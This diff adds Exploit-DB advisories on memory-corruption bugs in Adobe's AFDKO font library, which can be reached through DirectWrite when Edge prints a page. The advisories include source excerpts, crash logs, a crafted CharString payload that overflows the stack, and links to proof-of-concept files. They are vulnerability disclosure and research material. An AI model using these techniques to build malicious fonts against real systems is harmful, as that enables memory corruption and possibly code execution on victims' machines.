+#9  0x00000000004f9471 in main (argc=2, argv=0x7fffffffdc30) at ../../../../source/tx.c:1631
+(gdb) print h
+$1 = (dnaCtx) 0xbebebebebebebebe
+(gdb)
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47090.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47091.txt b/exploits/windows/dos/47091.txt
new file mode 100644
index 000000000..d160c0764
--- /dev/null
+++ b/exploits/windows/dos/47091.txt
@@ -0,0 +1,177 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.
+
+-----=====[ Description ]=====-----
+
+The afdko/c/public/lib/source/t2cstr/t2cstr.c file in AFDKO implements the Type 2 CharString interpreter for OpenType fonts. The interpreter stack is represented by the following structure in the t2cCtx object:
+
+--- cut ---
+    70      struct /* Operand stack */
+    71      {
+    72          long cnt;
+    73          float array[CFF2_MAX_OP_STACK];
+    74          unsigned short numRegions;
+    75          long blendCnt;
+    76          abfOpEntry blendArray[CFF2_MAX_OP_STACK];
+    77          abfBlendArg blendArgs[T2_MAX_STEMS];
+    78      } stack;
+--- cut ---
+
+Values are popped off the stack in the instruction handlers in t2Decode() using the POP() macro:
+
+--- cut ---
+   152  #define POP() (h->stack.array[--h->stack.cnt])
+--- cut ---
+
+As the macro assumes that the stack is non-empty, another macro in the form of CHKUFLOW() is required to verify this requirement:
+
+--- cut ---
+   137  /* Check stack contains at least n elements. */
+   138  #define CHKUFLOW(h, n)                                       \
+   139      do {                                                     \
+   140          if (h->stack.cnt < (n)) return t2cErrStackUnderflow; \
+   141      } while (0)
+--- cut ---
+
+As a result, it is essential for the interpreter's memory safety to invoke CHKUFLOW() with an appropriate "n" argument before using POP() the corresponding number of times. In a majority of cases, the interpreter operates on the stack correctly; however, we have found several instances where the CHKUFLOW() calls are missing. The problems were identified in the handling of the following instructions:
+
+- tx_callgrel
+- tx_rmoveto
+- tx_vmoveto
+- tx_hmoveto
+- tx_SETWVN
+
+For example, the handler of the "rmoveto" instruction is shown below:
+
+--- cut ---
+  1484              case tx_rmoveto:
+  1485                  if (callbackWidth(h, 1))
+  1486                      return t2cSuccess;
+  1487                  {
+  1488                      float y = POP();
+  1489                      float x = POP();
+  1490                      if ((h->flags & IS_CFF2) && (h->glyph->moveVF != NULL))
+  1491                          popBlendArgs2(h, &INDEX_BLEND(0), &INDEX_BLEND(1));
+  1492                      callbackMove(h, x, y);
+  1493                  }
+  1494                  break;
+--- cut ---
+
+It's clear that the two POP() invocations in lines 1488 and 1489 are not preceded by CHKUFLOW(). Such bugs may have two kinds of security-relevant consequences:
+
+1. Out-of-bounds data is read and used as arguments to the affected instructions,
+2. The stack index becomes negative, which could facilitate overwriting memory residing directly before the stack array.
+
+In this particular case, the stack counter itself is placed before the stack array. This means that consequence #1 is not really a problem as the out-of-bounds data is initialized and its value is known to the attacker. As for item #2 -- an attack would require the CharString execution loop to continue to the next instruction while preserving the negative value of h->stack.cnt. For the rmoveto, vmoveto and hmoveto instructions, the stack counter is reset back to 0 in line 2303, because their handlers end with a "break;" statement:
+
+--- cut ---
+  2301          } /* End: switch (byte0) */
+  2302          clearBlendStack(h);
+  2303          h->stack.cnt = 0; /* Clear stack */
+  2304      }                     /* End: while (cstr < end) */
+--- cut ---
+
+This leaves us with callgrel and SETWVN. In both cases, the out-of-bounds argument would have to be valid in the context of those instructions in order for them to not return with an error. Due to the fact that the POP() macro first decrements h->stack.cnt and then reads from h->stack.array[h->stack.cnt], the value read will always be 0xffffffff, interpreted as a float. A 32-bit float with a binary representation of 0xffffffff (which translates to NaN) takes the value of 0x80000000 when cast to an integer. According to our analysis, it is impossible for 0x80000000 to act as a valid subroutine index (in case of callgrel) or number of cube axes (in case of SETWVN). As a result, the handlers will return an error in the following locations before another instruction can execute with the negative stack index:
+
+--- cut ---
+  1298                  long num = unbiasLE((long)POP(), h->aux->gsubrs.cnt);
+  1299                  if (num == -1)
+  1300                      return t2cErrCallgsubr;
+--- cut ---
+
+and:
+
+--- cut ---
+  1913                              int numAxes = (int)POP();
+  1914                              result = do_set_weight_vector_cube(h, numAxes);
+  1915                              if (result || !(h->flags & FLATTEN_CUBE))
+  1916                                  return result;
+--- cut ---
+
+In summary, the missing CHKUFLOW() instances currently seem non-exploitable due to coincidental memory layout, conversions between data types and the semantics of the affected instructions. On the other hand, if only one of the above conditions changed in the future, these issues could become trivially exploitable by making it possible to overwrite t2cCtx.stack.cnt with an arbitrary value, thus potentially enabling arbitrary relative reads/writes on the native stack. We therefore recommend fixing the bugs despite the current exploitability assessment. 
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file contains a CharString for glyph "A" which consists only of one instruction, rmoveto. When the instruction executes, the interpreter stack is empty, so it picks up the arguments from h->stack.array[-1] and h->stack.array[-2], demonstrating the bug.
+
+-----=====[ Crash logs ]=====-----
+
+It seems impossible to craft a font file which crashes a regular build of the CharString interpreter. However, we have patched the t2cstr.c source code to insert AddressSanitizer redzones in between the various arrays in the t2cCtx structure. A "tx" program compiled with this patch and started with a ./tx -cff poc.otf command crashes with the following report:
+
+--- cut ---
+=================================================================
+==122021==ERROR: AddressSanitizer: use-after-poison on address 0x7fffd5a9364c at pc 0x00000067a35c bp 0x7fffd5a8fc30 sp 0x7fffd5a8fc28
+READ of size 4 at 0x7fffd5a9364c thread T0
+    #0 0x67a35b in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1488:31
+    #1 0x670a5b in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2591:18
+    #2 0x542960 in readGlyph afdko/c/public/lib/source/cffread/cffread.c:2927:14
+    #3 0x541c32 in cfrIterateGlyphs afdko/c/public/lib/source/cffread/cffread.c:2966:9
+    #4 0x509662 in cfrReadFont afdko/c/tx/source/tx.c:151:18
+    #5 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #6 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #7 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #8 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #9 0x7f6a599042b0 in __libc_start_main
+    #10 0x41e5b9 in _start
+
+Address 0x7fffd5a9364c is located in stack of thread T0 at offset 76 in frame
+    #0 0x66eb8f in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2523
+
+  This frame has 2 object(s):
+    [32, 757896) 'h' (line 2524) <== Memory access at offset 76 is inside this variable
+    [758160, 758376) 'Exception' (line 2586)
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: use-after-poison afdko/c/public/lib/source/t2cstr/t2cstr.c:1488:31 in t2Decode
+Shadow bytes around the buggy address:
+  0x10007ab4a670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x10007ab4a6c0: f1 f1 f1 f1 00 00 f7 f7 f7[f7]00 00 00 00 00 00
+  0x10007ab4a6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007ab4a710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==122021==ABORTING
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47091.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47092.txt b/exploits/windows/dos/47092.txt
new file mode 100644
index 000000000..d52bc7ac5
--- /dev/null
+++ b/exploits/windows/dos/47092.txt
@@ -0,0 +1,207 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The afdko/c/public/lib/source/t2cstr/t2cstr.c file in AFDKO implements the Type 2 CharString interpreter for OpenType fonts. The interpreter stack is represented by the following structure in the t2cCtx object:
+
+--- cut ---
+    70      struct /* Operand stack */
+    71      {
+    72          long cnt;
+    73          float array[CFF2_MAX_OP_STACK];
+    74          unsigned short numRegions;
+    75          long blendCnt;
+    76          abfOpEntry blendArray[CFF2_MAX_OP_STACK];
+    77          abfBlendArg blendArgs[T2_MAX_STEMS];
+    78      } stack;
+--- cut ---
+
+The "cnt" and "array" fields correspond to the regular stack used by all kinds of OpenType fonts. The remaining fields only have a purpose in the handling of the new CFF2 format (variable fonts). Whenever a new value is pushed on the stack, it is written to array[] and optionally blendArray[], as seen in the definition of the PUSH() macro:
+
+--- cut ---
+   153  #define PUSH(v)                                                                                       \
+   154      {                                                                                                 \
+   155          if (h->aux->flags & T2C_IS_CFF2) h->stack.blendArray[h->stack.blendCnt++].value = (float)(v); \
+   156          h->stack.array[h->stack.cnt++] = (float)(v);                                                  \
+   157      }
+--- cut ---
+
+However, the reverse POP() macro only pops a value from the main stack, and doesn't touch blendCnt/blendArray:
+
+--- cut ---
+   152  #define POP() (h->stack.array[--h->stack.cnt])
+--- cut ---
+
+This assymetry creates the following problem: there are CFF instructions such as the arithmetic ones, which take values from the top of the stack, use them as factors in some operation, and push the result back. More formally, they pop N values and push back M values, where N != 0, M != 0, N >= M. After executing such an instruction, the stack index is smaller or equal to its previous value.
+
+Because of this, the interpreter doesn't need to check for stack overflow (use the CHKOFLOW macro), and instead must only check if there are enough input values on the stack (with CHKUFLOW). Examples of such behavior are shown below:
+
+--- cut ---
+  1616                          case tx_abs:
+  1617                              CHKUFLOW(h, 1);
+  1618                              {
+  1619                                  float a = POP();
+  1620                                  PUSH((a < 0.0f) ? -a : a);
+  1621                              }
+  1622                              continue;
+  1623                          case tx_add:
+  1624                              CHKUFLOW(h, 2);
+  1625                              {
+  1626                                  float b = POP();
+  1627                                  float a = POP();
+  1628                                  PUSH(a + b);
+  1629                              }
+  1630                              continue;
+--- cut ---
+
+However, this approach is only valid if the PUSH/POP operations are fully symmetric. In the current state of the code, the execution of each such instruction increments the blendCnt counter without verifying if it goes out-of-bounds. By executing many such instructions in a variable font, it possible to overflow blendArray[] and corrupt the memory after it, including other fields of the t2cCtx object and further data stored on the thread's native stack. This may eventually lead to arbitrary code execution.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file includes a specially crafted CharString for glyph "A" of the format:
+
+--- cut ---
+1621139584 134217728 div dup exch exch exch exch exch ...
+--- cut ---
+
+The initial four instructions craft two floats on the stack with a binary representation of 0x41414141. The remaining part of the program is the "exch" instruction repeated 30000 times, which keeps the number of elements on the regular stack at 2 (by just continuously exchanging them), while filling out the t2cCtx.stack.blendArray array with more and more data until it is overflown.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit "tx" utility compiled with AddressSanitizer and a custom patch to insert ASAN redzones in between the t2cCtx structure fields crashes with the following report, when run as ./tx -cff poc.otf:
+
+--- cut ---
+=================================================================
+==158130==ERROR: AddressSanitizer: use-after-poison on address 0x7ffc38744c30 at pc 0x000000682b20 bp 0x7ffc3873e950 sp 0x7ffc3873e948
+WRITE of size 4 at 0x7ffc38744c30 thread T0
+    #0 0x682b1f in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1729:33
+    #1 0x670a5b in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2591:18
+    #2 0x542960 in readGlyph afdko/c/public/lib/source/cffread/cffread.c:2927:14
+    #3 0x541c32 in cfrIterateGlyphs afdko/c/public/lib/source/cffread/cffread.c:2966:9
+    #4 0x509662 in cfrReadFont afdko/c/tx/source/tx.c:151:18
+    #5 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #6 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #7 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #8 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #9 0x7fc9e2d372b0 in __libc_start_main
+    #10 0x41e5b9 in _start
+
+Address 0x7ffc38744c30 is located in stack of thread T0 at offset 10512 in frame
+    #0 0x66eb8f in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2523
+
+  This frame has 2 object(s):
+    [32, 757896) 'h' (line 2524) <== Memory access at offset 10512 is inside this variable
+    [758160, 758376) 'Exception' (line 2586)
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: use-after-poison afdko/c/public/lib/source/t2cstr/t2cstr.c:1729:33 in t2Decode
+Shadow bytes around the buggy address:
+  0x1000070e0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000070e0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000070e0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000070e0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000070e0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x1000070e0980: 00 00 00 00 00 00[f7]f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000070e0990: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000070e09a0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000070e09b0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000070e09c0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000070e09d0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==158130==ABORTING
+--- cut ---
+
+The same "tx" program compiled without instrumentation crashes when reaching the end of the stack while still trying to write more data to blendArray. The 0x41414141 values written all over the stack can be seen in gdb's corrupted stack trace listing.
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x00000000004603b4 in t2Decode (h=0x7ffffff60188, offset=23552) at ../../../../../source/t2cstr/t2cstr.c:1730
+1730                                    PUSH(a);
+(gdb) info reg $rax $rsp
+rax            0x7ffffffff008   140737488351240
+rsp            0x7ffffff5fd60   0x7ffffff5fd60
+(gdb) p/x $xmm0
+$1 = {v4_float = {0xc, 0x0, 0x0, 0x0}, v2_double = {0x0, 0x0}, v16_int8 = {0x41, 0x41, 0x41, 0x41, 0x0 <repeats 12 times>}, v8_int16 = {0x4141, 0x4141,
+    0x0, 0x0, 0x0, 0x0, 0x0, 0x0}, v4_int32 = {0x41414141, 0x0, 0x0, 0x0}, v2_int64 = {0x41414141, 0x0}, uint128 = 0x00000000000000000000000041414141}
+(gdb) where
+#0  0x00000000004603b4 in t2Decode (h=0x7ffffff60188, offset=23552) at ../../../../../source/t2cstr/t2cstr.c:1730
+#1  0x000000000045cb26 in t2cParse (offset=1094795585, endOffset=83566, aux=0x41414141, gid=2, cff2=0x41414141, glyph=0x6fd6e8, mem=0x7150b8)
+    at ../../../../../source/t2cstr/t2cstr.c:2591
+#2  0x0000000041414141 in ?? ()
+#3  0x00000000007150b8 in ?? ()
+#4  0x0000000041414141 in ?? ()
+#5  0x00007fffffffd620 in ?? ()
+#6  0x0000000041414141 in ?? ()
+#7  0xfffffffffffffffc in ?? ()
+#8  0x0000000041414141 in ?? ()
+#9  0x0000000000474840 in ?? () at ../../../../../source/tx_shared/tx_shared.c:4891
+#10 0x0000000041414141 in ?? ()
+(gdb) print h->stack.blendCnt
+$2 = 40551
+--- cut ---
+
+The Microsoft Edge renderer process crashes while trying to dereference a partially overwritten h->aux pointer:
+
+--- cut ---
+(51fc.496c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!t2Decode+0x119c:
+00007ffb`29e82710 f60080          test    byte ptr [rax],80h ds:000001d3`41414141=??
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 0000006a`3df8b9e0 00007ffb`29e84a62 DWrite!t2Decode+0x119c
+01 0000006a`3df8bb20 00007ffb`29e6c103 DWrite!t2cParse+0x28e
+02 0000006a`3df9b480 00007ffb`29e6e3f7 DWrite!readGlyph+0x12b
+03 0000006a`3df9b4f0 00007ffb`29e62272 DWrite!cfrIterateGlyphs+0x37
+04 0000006a`3df9b540 00007ffb`29df157a DWrite!AdobeCFF2Snapshot+0x19a
+05 0000006a`3df9ba40 00007ffb`29df0729 DWrite!FontInstancer::InstanceCffTable+0x212
+06 0000006a`3df9bc20 00007ffb`29df039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+07 0000006a`3df9be40 00007ffb`29dd5a4e DWrite!FontInstancer::CreateInstance+0x192
+08 0000006a`3df9c1a0 00007ffb`34eb61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+09 0000006a`3df9c230 00007ffb`34ea9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0a 0000006a`3df9c350 00007ffb`0fb750f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0b 0000006a`3df9c3a0 00007ffb`0fb4fcb0 edgehtml!CDXPrintControl::Close+0x44
+0c 0000006a`3df9c3f0 00007ffb`0fb547ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0d 0000006a`3df9c420 00007ffb`0fa2b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0e 0000006a`3df9c450 00007ffb`0f689175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+0f 0000006a`3df9c490 00007ffb`0eb568f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47092.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47093.txt b/exploits/windows/dos/47093.txt
new file mode 100644
index 000000000..a57aa0bb8
--- /dev/null
+++ b/exploits/windows/dos/47093.txt
@@ -0,0 +1,139 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.
+
+In this specific case, the CFR_NO_ENCODING flag must be unset while interacting with AFDKO to trigger the bug. According to our analysis, DirectWrite currently does specify this flag, but it still contains the readEncoding() function including the vulnerable code. In case the code can be reached in a way we haven't considered, or the CFR_NO_ENCODING flag is ever removed in the future, we have opted to report the bug despite its apparent unreachability at this time.
+
+-----=====[ Description ]=====-----
+
+The readEncoding() function in afdko/c/public/lib/source/cffread/cffread.c is designed to read and parse the encoding table of an input OpenType font. It is called by cfrBegFont(), the standard entry point function for the "cfr" (CFF Reader) module of AFDKO, if the CFR_NO_ENCODING flag is not set. The relevant part of the function is shown below:
+
+--- cut ---
+  2288              fmt = read1(h);
+  2289
+  2290              switch (fmt & 0x7f) {
+  2291                  case 0:
+  2292                      cnt = read1(h);
+  2293                      while (gid <= cnt)
+  2294                          encAdd(h, &h->glyphs.array[gid++], read1(h));
+  2295                      break;
+  2296                  case 1:
+  2297                      cnt = read1(h);
+  2298                      while (cnt--) {
+  2299                          short code = read1(h);
+  2300                          int nLeft = read1(h);
+  2301                          while (nLeft-- >= 0)
+  2302                              encAdd(h, &h->glyphs.array[gid++], code++);
+  2303                      }
+  2304                      break;
+  2305                  default:
+  2306                      fatal(h, cfrErrEncodingFmt);
+  2307              }
+--- cut ---
+
+In both loops in lines 2292-2294 and 2297-2303, the code doesn't consider the size of the h->glyphs array and writes to it solely based on the encoding information. If the values read from the input stream in lines 2292, 2297 and/or 2300 exceed the number of glyphs in the font, the array may be overflown by the encAdd() function, corrupting adjacent objects on the heap. The h->glyphs array is initialized in readCharStringsINDEX() based on the number of CharStrings found in the font:
+
+--- cut ---
+  1791      dnaSET_CNT(h->glyphs, index.count);
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The three attached proof of concept files were generated by a fuzzer running against the "tx" utility compiled with AddressSanitizer. They are not complete OpenType fonts but rather raw CFF streams, which causes tx to not use the CFR_NO_ENCODING flag, which is necessary to reach the vulnerable readEncoding() function (c/tx/source/tx.c):
+
+--- cut ---
+   425              case src_OTF:
+   426                  h->cfr.flags |= CFR_NO_ENCODING;
+   427                  /* Fall through */
+   428              case src_CFF:
+   429                  cfrReadFont(h, rec->offset, rec->iTTC);
+   430                  break;
+--- cut ---
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit "tx" program compiled with ASAN crashes with the following report when started with a ./tx -cff poc.cff command:
+
+--- cut ---
+=================================================================
+==205898==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a00000b220 at pc 0x0000005573aa bp 0x7fff35b2b5c0 sp 0x7fff35b2b5b8
+READ of size 8 at 0x62a00000b220 thread T0
+    #0 0x5573a9 in encAdd afdko/c/public/lib/source/cffread/cffread.c:2203:14
+    #1 0x540f80 in readEncoding afdko/c/public/lib/source/cffread/cffread.c:2302:29
+    #2 0x529eb9 in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2805:17
+    #3 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #4 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #5 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #6 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #7 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #8 0x7f116e1722b0 in __libc_start_main
+    #9 0x41e5b9 in _start
+
+0x62a00000b220 is located 32 bytes to the right of 20480-byte region [0x62a000006200,0x62a00000b200)
+allocated by thread T0 here:
+    #0 0x4c63f3 in __interceptor_malloc
+    #1 0x6c9ac2 in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x5474a4 in dna_manage afdko/c/public/lib/source/cffread/cffread.c:271:17
+    #3 0x7de64e in dnaGrow afdko/c/public/lib/source/dynarr/dynarr.c:86:23
+    #4 0x7dec75 in dnaSetCnt afdko/c/public/lib/source/dynarr/dynarr.c:119:13
+    #5 0x53e6fa in readCharStringsINDEX afdko/c/public/lib/source/cffread/cffread.c:1791:5
+    #6 0x5295be in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2769:9
+    #7 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #8 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #9 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #10 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
